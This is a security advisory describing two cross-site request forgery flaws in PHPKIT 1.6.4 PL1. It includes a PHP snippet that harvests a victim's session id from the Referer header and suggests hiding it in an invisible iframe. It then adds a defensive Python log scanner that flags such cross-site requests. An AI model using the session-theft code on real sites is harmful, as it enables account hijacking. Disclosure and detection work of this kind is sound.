###################################################################
PHPKIT 1.6.4 PL1 2 XSRF Vulnerabilities found by NBBN
###################################################################
Vendor: http://www.phpkit.de/
PHPKIT puts the session id into every forum link as a GET parameter. So if an
attacker sends a link to a victim, for example in a private message, he obtains
the session id by reading it out of the Referer header:
*******************************************************************************************
::Vulnerabilities:
There are two vulnerabilities (there are more XSRF, but the principle is the same):
1) Update User Profile XSRF (does not ask for the current password)
2) Create an admin XSRF
1)
<?php
/* profile updated. Better is to create a
site and then put this code in an invisible iframe */
$ref = $_SERVER['HTTP_REFERER'];                          // Here is the referer
$sid = substr($ref, strpos($ref, 'PHPKITSID=') + 10, 32); // the 32-char session id following 'PHPKITSID='
?>
2) Create admin
IMPORTANT: This works only if the admin was logged in to the admincp before he
clicked the link from the attacker.
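Both issues above leave the same trace in the forum's own access log: a request that carries a PHPKITSID in its URL while the Referer names a page outside the forum. The following Python is an added example for spotting that pattern, not code from the advisory or from PHPKIT; the hostname forum.example, the log lines and the session ids are constructed, and only the parameter name PHPKITSID comes from the advisory.

```python
import re
from urllib.parse import urlsplit, parse_qs

SITE_HOST = "forum.example"  # assumed hostname of the PHPKIT installation

# Apache "combined" format: ip ident user [time] "request" status size "referer" "agent"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" '
    r'\d{3} \S+ "(?P<referer>[^"]*)" "[^"]*"$'
)

# Constructed sample lines; the session ids are made up. Line 3 is the case the
# advisory describes: a request carrying a PHPKITSID whose Referer is a foreign page.
SAMPLE_LOG = """\
203.0.113.7 - - [10/Oct/2023:13:55:36 +0000] "GET /forum.php?PHPKITSID=aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa HTTP/1.1" 200 512 "http://forum.example/index.php?PHPKITSID=aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa" "Mozilla/5.0"
203.0.113.7 - - [10/Oct/2023:13:56:01 +0000] "GET /style.css HTTP/1.1" 200 99 "-" "Mozilla/5.0"
198.51.100.9 - - [10/Oct/2023:13:57:12 +0000] "GET /profile.php?action=update&PHPKITSID=bbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbb HTTP/1.1" 200 301 "http://attacker.example/bait.html" "Mozilla/5.0"
198.51.100.9 - - [10/Oct/2023:13:58:40 +0000] "GET /pm.php?PHPKITSID=cccccccccccccccccccccccccccccccc HTTP/1.1" 200 870 "-" "Mozilla/5.0"
"""

def session_id_in(url):
    """Return the PHPKITSID carried in a URL's query string, or None."""
    return parse_qs(urlsplit(url).query).get("PHPKITSID", [None])[0]

def referer_host(referer):
    """Hostname of a Referer header value; None when the header was empty ('-')."""
    return None if referer in ("", "-") else urlsplit(referer).hostname

def find_cross_site_session_requests(lines, site_host=SITE_HOST):
    """Flag requests whose URL carries a PHPKITSID while the Referer names a host
    other than the forum: the trace left by a link or hidden iframe on a foreign
    page driving an already-authenticated request (the XSRF pattern above)."""
    findings = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue  # not a combined-format line; skip rather than guess
        sid = session_id_in(m["path"])
        host = referer_host(m["referer"])
        if sid is None or host is None or host == site_host:
            continue  # no session id in the URL, or an on-site / direct navigation
        findings.append({
            "ip": m["ip"],
            "path": m["path"].split("?", 1)[0],
            "referer_host": host,
            "sid_prefix": sid[:6],  # truncated so the report itself does not leak the id
        })
    return findings
```

Running `find_cross_site_session_requests(SAMPLE_LOG.splitlines())` flags only the profile-update request arriving from attacker.example; the on-site navigation and the direct hit with no Referer are left alone.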